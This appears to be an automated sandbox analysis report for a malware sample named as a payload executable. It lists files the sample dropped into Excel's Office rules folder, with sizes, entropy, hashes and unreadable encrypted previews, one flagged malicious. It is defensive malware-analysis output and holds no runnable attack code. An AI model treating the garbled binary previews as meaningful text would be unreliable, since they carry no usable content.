                                                                                                                                                                      Preview:<?xml..'SJZ.l".X...X.Y?...63||.m.\....u)g.l.....R[{G....h...N.it.......%.Wa..)xJpS..o.-.Mgx{.:c..n.g.7Z..6...o"....G.....A\.F...5..H2~.B...R0....o.N.rF..6..C.t.fN..w0Ima.cF@.x.&.[..n.up.T....K6.W..x..,..C....C.7..na.$.*c...T}xB.`...,.............P.D...K....O....+[...|O..=...6_.T..0..s2<....v..j3.GS.~g.:o8.....SY..{..(....oCQ.F8m..C.....}`.Z 3R..K.9EJ..Cn..g...@+:../.....5|....a...m.H:....V,._.(....4..<...D....../...L...f.. sf.;.N0..@e.<...W..u.....e...`....a.....6.b........+1...E..j..4c.<$F.E..{..w..w$yhja.:.g...-(...>...l.Bv...#..pW.....QV.._......I..#..62..#..6?e....x..H...u.".7H.u.e.=..U.k..6b.Tt.2.Ea..{....."..K%....b..J ....|i.d8g...B)h................V{..>K..P...+..im}.qwT...1..R....&N:*...Q...u...B5.W.c.%..N ......+...}O4...".E.0..9T.:.....=F..-.14..W.D..X,..yg.\.T"*o>..z...0M.`.]..fdj.oM..2._h._...>..3U....}.3....v.'..........%j.a$m+(.c....W..%.{.Z......f/....#....-..l......'.H.L..}ghW..kDl.{d.....s.)...G]U+..jx4g............7.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2320
                                                                                                                                                                      Entropy (8bit):7.914425822563693
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:arX451cvnkRA4yR5Xz/nkpwhCTcKbQlJsoiRAoBrFg4f/9N7tqZyXpkfj0Y2I3Yb:PekRA4yRBQuCYKb87ylf/9xtqZmpkfT6
                                                                                                                                                                      MD5:4C7233942B2709B7875D2BB7BA644902
                                                                                                                                                                      SHA1:010B40D02FCDFC88ACBA7C26A7CDAE900581BDD5
                                                                                                                                                                      SHA-256:B54E24174894850FC9589889419B0218A4D38727123B2197EB3E6069AB944EC3
                                                                                                                                                                      SHA-512:BE314907D390954882EF1392A9F2EEBE4BD8803D04E5A20CA42D4230A62EC2987BA5CD839E5BFE139E65B49173BF701CF1892C35FE88936A83F4A499A80D3B37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.M.;.!...{....1.W=.~+... .I...VR!..6..]...&55mq.Y.3.T.fb..%...m...Z.....WlhHS..<^s...Hq..=....efI)+..;./.kZ...s..+..m..s...H...-u."......{...f.o6z.).Gi.h.G.5.pS}Oe...Jy!..G...$.....;<B.....G.....T...,t7..V.C...h.......z.@K....+d..m..LW......|W......*S./...K..Fp....B.S....QAY.Vo..-h...O_e[..h.r..q.WK.....[...Z..M...F..U......GH.>.....@-..N...~.Zv,...x.Yu.}......2......i.U.`82".3..bq....X.3)7..[f.r...$....'..l.........w...g....)hl<325.........R(..~C..mO.............[j.nIX+.O...R....*.o@m......(m)g.S.hv..N..>..2..........JK...z..-.X..A..F..l.y.......*..........#.}.z..M..`.....)....D*..ZH.....~.Vm8A...]......Xvg.X......!.....M.+.r.).R....D.e.(5.,.~.q...%$.bzJz..m.e5:.r.5c.wX....x.k.Pz...|)......Q......7#g+a1y.G6v..."...)90 .@.C.(P.u.R....W.$.5....*}..........~AV*-..9...L.z../.E.^....O..g.8..].b.c.m.W...../.G~.%9..g....n!6....r`9(y.ZX.{..W5.Zb}.b..-Dt............(...$.7E....4....U.....q..O...p\r. .{8......S....o..&.s.!3u.0..+../[q....%..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):41208
                                                                                                                                                                      Entropy (8bit):7.996338588607792
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:768:zxcdDw3wHMcTNPA+uW70xA4mH5PNNgesax3n53bj/UwiRMuZWtMuYVkxW7J:z4swxhqA4mZlWevNbj6S4d
                                                                                                                                                                      MD5:FFCDE3D5CE717B47BCD49ABD7053EF76
                                                                                                                                                                      SHA1:BEF564435A3203D0A94F7FDEAA8AE4F2A417BBA1
                                                                                                                                                                      SHA-256:6FCDA8E6423238C83A79CCD075E9574CEF48D5FDB5480ABF32F6FEFB4498BF66
                                                                                                                                                                      SHA-512:9D1BBB12F485A28BC4F50BC84C1618F458F825C85EEDE5C13EFCB606ED470DDDD73792F3C7257DD6B8402C11C835DA44C422BC876CC75E5F12C2837396C9FC0D
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:<?xml.1I..n.....X...`*........J.Y...(f:z;.VO'..A-R.[..RT...^....s~.7.._..x......U5.}Y.....@z~f.EF.p....NQ..?...vQN..~.........!......!lO..wO..g.W.M.-!.F.... .*.+..7...P..S..?.c.......&.....C....O.D.|.a...$..^hXd..S.............../..l..vVE/Y..\.$....Lm..P...5....W.F|C.m.oE.<..g.p..F....\).]=..|..$.D...C.ub.6F..$....Mf..{$....*.....h...(Ei.x.G:......Q....K-..8..rO......td..}@..._I.W.Rw..B>.t.}...K.....^........d.|Ko.).]....@..I..e.!..>wK.......?...gw..3Ah...x......v.:W...........-......G..QY.[<?$`.P....6..n,+....2..3.37..1...*giE.....uX0T_.*.Qy...r..mD.R....Y.|.;..x...?M...M.W7..w..K.@."...#..J.Na..;&.....P.S-.N.^.M.............p.7Q..z..J.~[Hr.3.Z..L...Ih.b......j.....H.0.z..M.1=..DzF.N{........u.X..,..O%.h.U.t.F.oc....Z8P{l..].Q.#w....0..G}.N...p..ebK}H......5....N;.....z....I.......i.....[G.OzB'....Q.da...f.P.....&...7o...$..... ..O/1T...M).Yc..9....S..HYMu.;....v._J..K.#...,..V..).?9D...c^....k...].N.J.5I...`..........=.j.q|.Z$.V...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):785
                                                                                                                                                                      Entropy (8bit):7.715457079228646
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:gADr+q8OqzPEqUb0dl4/L4iV/LyOEjuzymGEuSoujENJlFGqzhKZai8TaMHWZWSw:Fryv79dlAL35K5mr/dClF1MZa5TaX2bD
                                                                                                                                                                      MD5:C197CB5CCE0E9459768307444443231D
                                                                                                                                                                      SHA1:BC25F89F3AC5F8EA8AEBEA8B7F527BDFFD9BB9DB
                                                                                                                                                                      SHA-256:1611E55C942AE8C2B09C32412D4D6BF18057A4E2DCC722307B60C00C0339A09D
                                                                                                                                                                      SHA-512:DA94132A278539DEE78B5F3257A7225CFCA904D9ADC62411726EBE7367E34F23E0A2E727107745747C215F66627159B11EC1D7191DFC9101CFA963DB37711E68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.[shHJfOK.1...E..^........H&8D.3q....W..s....[.,....N.4.z..D.o.9......Uk.......S.......d.....o..\.e...5T.PC....i."...s...7.c...!......|..{%..:.....3.Om.P.h..pXNi.../x....^.f...v%.x.].tM.[@G.qX..Z."U..x.N.r<"...t...Z...%.g...a...B.'^..?E%j.QW...2..../.C.|.vP.......i(Z.9.D$.....=V.@..S..>`.7SB........Ti`...}w..|Q..7....@..v..').#..L.N...#).t.P........o.-...z..L/...6R.).^%.K..V_.....06......1E;....o.C/.`....*..0fuQ..G..2.V...0R...^.<`.....m..j`.....@....yR..V0.`;.....w......+..(.h..h....1.+.h..1..G..@]..A.6.R.'.I.....P.^Xu....{..{.:.).T....8.`.c..{8....Pw!B].c.5z.....h2hU`AM.p.n...t.:.V0^`.k.}....2...a....%..r...!...C..>.......;OsH.......M..w.E.......x...7..R.(mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.7059213667738415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:SD9CtR+crPydxPLrm/3suZUc3ZyS7C5ADQ6lfLB5Z07IvabeNiN5qw2yTr4SUdNX:SD9IjrPOJHYl57PkoB5yIvabegLqwPX4
                                                                                                                                                                      MD5:AEABC661CA82FF5F177C2049BDBBCCDD
                                                                                                                                                                      SHA1:6C0E3BA0DAFCCEF98F2F1E259D28CA983C03FC15
                                                                                                                                                                      SHA-256:66140FC99F0CAA6063BA2143FF239DCC43A22DD565EC42809500BF29D49C1C2E
                                                                                                                                                                      SHA-512:4FB0C5EDDF553B9A537837482195C9F2E1D670565B2F107B6CC8D219F1E77C9CC9797D6EF20D0C97491806C16F640FCA7B31D3E27E7AD429FB13654278E8ED80
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.. ..[5E+...\..ftE.>R%..A...h..EW.L.v..9......\..#..+.7.y.ea...Xb...9.m..{..zt_...R.O...[k..[.T.Um.........0zF..]..G...Q.V^J.R..*..Q./@N..Q%2... ..3..q.$"$....}k....7....Qu$..W.-!...!7S....[.......;..Vn..S....k..J)..Z..J....!g1P... 2~...&a.........r$Z\.`.>b...K.s.0.u.C.yS>G..@<.a..En...(.L......C..f.cK.....Y...b.x.`;0..7d..N."E|........6B.[..n........n...!..|...{.....r.P..s.....:g.u!s..........F8.E.....t.......f(..~AD2F.s.&..~..4WA.{.!..Y..W..G..l~.Ab..9Q^...7.../..E.E.33...0......G.q..8.~.o..f..D.z...c.@6...y,5....G.[.T..NNP.....l.....4vL...`.-\y..K..(..j..^...dP.#.i.s.%..."...b...B...B.-.-S.h..0Vw.<<..RP..q%.jA".......F3....I.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1428
                                                                                                                                                                      Entropy (8bit):7.862720034481019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:e54wurvhG4Hoafg40lq54BkUzqYlvHnxduAs3ydnvp5DInu7jRV63Mc2bD:e54wurvbIafgVq6fzL/x0/3MpCnsG3OD
                                                                                                                                                                      MD5:E5A40571DF8B7277B537B4D83FF448A3
                                                                                                                                                                      SHA1:DF5122596FEE5B9687E9FB4DB27BA2DA682EA64F
                                                                                                                                                                      SHA-256:A2A7BE0B0663E74843FCF60B908E919963078EEDE014508A3ACD1F1F8760F4EC
                                                                                                                                                                      SHA-512:31E964F6CA7B36A2F6726E0294EC4D6BB3642B0B50B60C7FE5FB0788641EF0AABCA5F805722BA8F6D09CF07482C9724B176AA6A05CC88F29F34058225084153E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.y.!.{.......0...tob........9+ y...A.<z..S[(c..A..rC.EZ..;.HS...f%U..FvT.Z.;).......D.L;...e-.8tc..._......2.^..<..F;...T.cr.pS......3......B.3..g........H.d.XGF.q...V M..d$..T.hd.u.9ym...30bQT.....3%...o.N...{&.br^.^.e.A.L.F5.zEw...I..cI.64~.~(....V4q.+..W..8.W_..Y.....|!.~._....dT.K.l.L*.. Q"Z.&F..=.].Pk......M.j......}.J.7Gx...6...?F...B7.Y....P.....PK1...L.2..9._..c.l..H...w]..h.._.x.h....O.|.u9C.....y.....V..D...y..t..F.Al........B...Nx.r_....I0............sb.L.....U..^....Y:k.$2}.%....Ly9^..R.Z...+..[..8...~...g.?.)....].f........] Sh~.S......{/.QF.|....J./.>v=.....e.......h9....W..... ......N...Z..B.6.n0>u.}...%BG...i.3oH..%.D...g.+....z-..\.POF..%5+.D|/........{....3....Q.(#<.........,....m..?..;.N.@.........n];J....v5...d..gw...K5..g........O.X-...}...w{.iU.4.}.P.*.iBn.Y....]H.L.r.H.(..k#+.../{k...M..)+.A*.^...A..d....z<h>.....J....B..mkm.yl..g...!x.nUm6.bI...R..'.n..."2^.".?.Y.0....#.i#N'MO...../9.MX.~...G..U;q.....pi}&

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                      Entropy (8bit):7.79833631641897
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:857RD87QMcxHYQRCRnZoUJrb6C9povDRMD3mJp9a4WCX+9LggUL2rQijrzeDRESW:M7F87lG4Qwf6Ueg4WCXk9IRESp0mz2bD
                                                                                                                                                                      MD5:88F076C2D53AE92D9E07523B853102A2
                                                                                                                                                                      SHA1:B31B3F4D63895A516FF299A45677D3E7BE679A88
                                                                                                                                                                      SHA-256:66921FC692E7D077C8055892922BB165C6D35F76EA9AFD15F31A80C8E77597EA
                                                                                                                                                                      SHA-512:6B8083BFC8E7AD88F56B1DF223A4E64CCDCD603D788E1FE7FA7E421A2DEC4773733A80FFC66EE6D4BC2297BFE5CF4D0B1A6BD1136C7D8A68F6059335065B525B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlA.u....E......;...D..~....f#}.X'.....>.e}g....L.|(G .....<z,TbR.O.y!.h."<.@.../..!.).L+[./.E[n.R.~^U.9W-..E.ti.c..F..I....,.y\.1>..xq.M+..1:eX@}.]..6.e.D.e.....X..X4).6..'......;....8^<.F.....TQ..._..s... q.....K....q-...C..D...m.b.......n4.........}.Pf]u..M\v.............0"<E..+...G~...D.r.joB..L.*TB.=.p....:...`.....:.0h.Y..j....\..r.8...w.fx.D..o...3/(t:..V...zm..X....g.I..Y..PIe.......x.yG..&.D...Q..ky..Q.i..~.F&..o...O..4..w.....J..5..Q@.}.]..n...e\"%.$....@.eK.@bi4O.g..g...Ti...e@O...G..E...aP^.....dwR...:qps.x..5.8=.oO.=..{.sv ...o..!{...~.\&.5.N.W.....{.;b.............I..x.....SG.F?.y ?9I.......a.S.w.%$PC.."c&..I..5#.=....k...r.1....&e.....<.2...F..NW..U:f$..x01RXa..7.o.....z._...P...LO.m...^K..n.C..l..O<.}.....=......Cf......w.._.O.g..6..Q.{d....k.A..|S.xbF.6..zET..,Cp.iM...V.H...;.).......q...s.K.X'g....#.3... e..Rd.'.B...C.......s'Q..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1008
                                                                                                                                                                      Entropy (8bit):7.804066271106972
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:LATa8IQc9CjbOsh+Ug9WrL3Tnufqff8vn1TSkDWkyKgeAnHLZjrprH5AZLUDyeW1:8pIAbR1LnCJvgkDDgfljsZihKhKj2bD
                                                                                                                                                                      MD5:88C80FEB4936F53A1E7A636E1CC3B2E9
                                                                                                                                                                      SHA1:9DFA72CE2DC28B2A67C64039EC0439419C1DC2A7
                                                                                                                                                                      SHA-256:D6C41045F9CC356C140D989136E8B813F6AF4FDF0876501021A625FFDBF548AB
                                                                                                                                                                      SHA-512:0DA83913A0FE82741385F0C8DE4696C73A8ECCE7EA1E36C86BE9526FA0A0285D11AE9245B0D815FA2DA20D74F37EBC3542FFE832F9FFFED9C1C7A9C727B42A93
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlV.u.........S.L.ex..%.=4..r.......Us........#.2.......g....QV"..d.7J....j.8..~..(..~.>3..#'(q..A..2\.....zP...5..Q.v.B.-I.+.%xj...XZ...Km......O.t..>.h.D...^/.d.g..#.n.u.......\q.%L.._..[..H.....!g.\...|.;;N..I.*..qo....5.;.L..B..r{...w..O..[.._~.}.g.f].@.fZ..9........@z.aK...cP.)..S......4_......z.{...x.7....e.OeK.6..)..x...I..-;....x....!.+.Y...+..s...D...8..7..$..J...]f..P. n.......0.^...09@....>#..f23. .D...6.i.........q7u..j.=.w.e....g.L...s....d...g@Em..<C...&].._.^|...)d$,..PvD.."C)...N...c...(.`,.....L}6.(.8.R....a.0.;.@.}.G.c<YC. ....b.1Q.....D[.z&.j.....n.l.....q..Q..|.......o.bf3.C.m......L...@..2.C..KB..[./-.z.".5...q~......}.7..|._.f^T.D._x..A...MBip..S..3,..vJg./.E.R..:b+..y."".W{..5...q...<*...#?.h."...N.7;. .:,G.V..>...u......K.<..[*....SQn..g.....v.kJ*./.}.{.><...aU.r..I.o..i....^.....G......:..:.......0..N.[C..........@.~....W...ljv. ....?-Ee.#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                      Entropy (8bit):7.824031646334744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zSCBXLHgFGOJbDM1FJSR8Wqr2P3/6qvl2bD:zSCByNNDM16RhIGP6/D
                                                                                                                                                                      MD5:FC1DBA8EC4DD5642C31D64C28AAA2A3F
                                                                                                                                                                      SHA1:287316FB8533812765B39AD1E583935B936A50A3
                                                                                                                                                                      SHA-256:7F0D4E55467626787C413196AB1A089F27D06C0EF50D1AC4D01978E160CE7B44
                                                                                                                                                                      SHA-512:28A13C6AF997DB92344E66F2AF5BB1CA5F08166844A0F4E7B5C9B8AE4345F98415BECC1C93C37A20659BCC923F5F68886602666962F7E6C586C24892A844C47A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlr......-...N...$6.a.PrF.8...E.<.........>4..5..e.....)+....ei.......j......_)....f....6J./......f.....v!.W.'P...YQ[..%.A.......-....).U3...&.^x!i-'...B..(..6vA%.\<h.F...k..~....a<.l#.......H...9I...bx..F..Y...%.`..d...Z....5p..T.0_x.X_..........szR.r.8..a.)}?........H.g...L.........v.NQ49}.|t......R..j....^.D....thucy.[N.)......e..M.._apK.1%...X.lh7.{....8..rPQl.S$C!s.F32.....8.w......p...E.....op....t.F.`7!....v.2.QA[.f.7.Q...../}....0.w!..]......He..K..{....pT...............v...-...:7..~.9a.?....c...W..RT.2.C. 2.w..d.d.P.._.....8gP....$H:P;.F&...8....w...A.e...+lu....La.I=T"...p'm!.../..H.I=.b....E..V.......q..2..J...RBc.L........qN.....de8..#?.6pr..w..@.e.....fO.WT.....f...... ......T.;.t.y.n.......:s.I.oG..Q.m...2(7O... ...s....S.9....;..V..R.M.$.....DV..:..../O..L..(d.V......v.....Y..#"4*........2......hM.BM....)...s...612nsx.yZ^...`...U....$.ak....[..u.x...K.% ..D.}.x.OBmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1453
                                                                                                                                                                      Entropy (8bit):7.861017675362285
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KxyhqyQ0koeMlMog44wTXedA13VF08eLTXJp550wG2WIovd8o2bD:KxK5Q0jesQuCA13VGlLT5Hc2WPdgD
                                                                                                                                                                      MD5:B7099DCB7AF654D6B9A986AA52749B98
                                                                                                                                                                      SHA1:0EDE5CE024F300A46FB926736D955D40DEAC0BAF
                                                                                                                                                                      SHA-256:8A4357277B302C115E245899B08A363740F7F9CC32B42FBDB4C3D43022AF65D9
                                                                                                                                                                      SHA-512:E5495DAC92F85D45FD165356598C2843A805145FB5BEAB35EFD6D6951D0A4BDA7EE5778FCF58E5963D609FA58F716F957A84B684A01A0040AFC23D4E7085974F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.L3......@;.f&.X&M..~. |m.....M.....e...W.~E-i...Z<..o.#...D...%.xP....*.......%.A.a...`Vw....D......-.../.f..6...~..)@\"..9...OU......_..[..i.'{.a.Qe..}.|[{.V...=...z....7.'.F.....8...$#.^...M....fq......G.A...l..s.;0..h .F. ......W.R..x.'...5.N.;U<...,.. ....g..wU/...Z.".Et..I..CR....Jk...s.-...t.F>]..fr%.;..bG..yj3..jA...L..'....@2.&x...G........N+P.$C.&....?m~.",..E..3..._...p..C.X.3.n]l..U0+..W.......K...../."fc..[_..P....z[...L....:=P~...]\.=_...i.u>@....O/Q....-&...?s.i3....0y.~.H{.z.vh.i.s....+./.._b..Gn..4 >.^nV.$Yi.Q.k]=.."t..h".*B?T...........~...>..9c~]Tf.o.93.H.u>..7.9A.l......M.k...q.(.x...Bd....hVq....X..u.c/...{`.Uc...v_;..6:Y....g..TC....4..K}.Th.E...U.N.N.>+....p.......[..@..2g-".X|..>.......W.wz..qv.5R.-....u..Z-.....Z../.1v..;Kf..sX.X..-N3|..v0.}5.....h.D.v1...>._.nQ.C.~...C.r.Ch;.8.......g...d[....Z....<.F.6....;......u.".J5j.x.F.....<1.....d.s.....dB..6K.....Y..M.....v[.[.k.94[.3.]}..{..gs{..|s.Ql~.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1388
                                                                                                                                                                      Entropy (8bit):7.832466553940327
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ggUdiceLZe7fJr/6aBJs7iTevtFKev/t0HyEH3BPlJtDW9RKvuOpZ9k9Wt82bD:ggUDeFe7hr/6aBJsweTKev/+HyEHDa9+
                                                                                                                                                                      MD5:EBFCA34D28DC96501D44AA02048BACE3
                                                                                                                                                                      SHA1:B029453D16116714A26655529074F50BA6AEB45A
                                                                                                                                                                      SHA-256:66AC8B472A4789BC1563F82220806C683833BB51BFF2DED1A7820228BEA20F8D
                                                                                                                                                                      SHA-512:3DD0FAF3C112F3A5923C73D2CB88935A112AEBC19BD0DE0835696A60D5B4E108626B400B5CBD0AD505FDA606B2F76713E65C1CE61C37D27634C5A8BEF5996C51
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlQ.(..s.9...%./.V".5...V.G0..An2.mC.5..w....^.V...6.N5..%.P.e....z....hO......b.nCi}p......$.'....P.t..0.=.#..G.(./DfZ.,k..v...B.|.?.[G.E..q.I.....R...\.l.S......1gC#.KI...h.EV.".J..2..>..^-NVm.....]..8.ooY......R...6\...J.-..p.#..({x.BBw.N.....!._0.G...<..+....9FS.|Fu..9Y..c.3Jy}.(..9......y..8.....|..a2Q$|......V.6/O{|.-....gaI. @...~...,...g..e..|.7.p.s*.pE.....b...B..1."W.n...X..N...{.!...3J.S...l...g..X........`.Lei.......Bk.../..T...Lrb.. ".A:.....FJ.@.R.B..e.[.<.X..B^...!...uD..7..CI.....V....L..DW...|.M;....j....*...0..7PU"....v..*...._.....B..Y{........KT^.......i[..c.2.\.N.2..G.-..[.S....Op........Qx...g...~B..\.......Aex..K..i........x.&...'.=.........q.Y.`I..9..A...........H..6j7.......b@...3.lY....`-..*....;N.].....9..>..#....i.~....R[..9}....p;S.G#...#.Jy......3Q...#./4.w.G+A......,...#r..a.4.6....c#m.PV+...lJ0]T.\S.g. ...V.Z....G.*.E.|;...T..=.C&.U......$h(.]x.~I.+..6.s~kNOW*1..z.w..(.PC..l.............=%....y..|D-.....N

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490011v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):856
                                                                                                                                                                      Entropy (8bit):7.7775151279858035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:K6kvQ9h4dPgQkGL3NnP7GMfOYETYzX6WeBM2bD:UgmdxkGTdG9wXqfD
                                                                                                                                                                      MD5:42A32ECCC3BEBCE0AE870EA1DCF8C1F1
                                                                                                                                                                      SHA1:10C0E650FDD8B027A0C974536EA0766BC306CFC8
                                                                                                                                                                      SHA-256:2C609165160EAE05C904918D5F2ADDEC47FB9497A101D44B7EE363CA28786607
                                                                                                                                                                      SHA-512:3186410E7B8487B3F62F2F15C5344A2DCB8302096808A7880ECBABAC7A786F897B8B7E6CDDAB6EBD7764A0E50C7B9103620AE56014CC79E7C58D9ABB1DB11AC1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...X#1.....L...V...(..2d{.g>~.G.q.CE,.Tw.XV2y%.{.K....{.I..#..&H".._.&>.)..g.S.(.......?k..../M*.1........pV.o.!..$..I#....xSB.ea... ..vo.@.E............n.{..t`.:.i...-7.Q...ZJ,{h...B 6z.........g..h.....[..j..M@.%`.T.;Y|..tI.x..o..88qp......FR.>...}..7."./.7..T: jd.P.)..c...5F.F.....B}...:.C..Ubq.....B,}.NO..t.......5.N...$.x$..gx...N...+.}Ia...h5.....QWK...z..T.d.....0....[uW...e.D=_.(..>.]1T.(.......&>[M....`v.wD..."...kWy.....g.......e.21.1..0..H....X..=..G..3E.f.W.....%.l..m..m._.ry....Q.M.`d....>...d}0P.xS..q...2. .K-.mEX.o.c].Gwg.m5|....1.E{....dIs..|...0...,bQ..:9jp.o.}.[M..'`)......s.e.p.@....M..qR.(.!@'.u.,..N...(CF.@...x...;r...9...W.7.3........:...%5A.J1T..J'..'.?.&....C.J.~../..n...In..._..wj..Da]P..$....O.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490014v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1084
                                                                                                                                                                      Entropy (8bit):7.843897415509714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3siCqkASHIMoii2ayJ5DmvHnOL9EDx3Ch6mxmQ6VIM9TV2bD:chqL6InBhyfDmvHOLil38BmQ6Vb96D
                                                                                                                                                                      MD5:A4D93C89B14BA84833C208A877A7FCED
                                                                                                                                                                      SHA1:F5D181C9DEA17F53B44F4382EFFB25AEF3D20E50
                                                                                                                                                                      SHA-256:67C5D3D74B6E4C131FA26D72DFC8EA85B0A401CBB33CA83F898E04937F07171D
                                                                                                                                                                      SHA-512:80FC89BDC8449C86F791561F482642371050D6A2B8037EF642EC820D78B9950E609D665CAE23A3F6A5612DCA182CD033366F5B10901F381E1F867BF38174BCD7
                                                                                                                                                                      Malicious:false
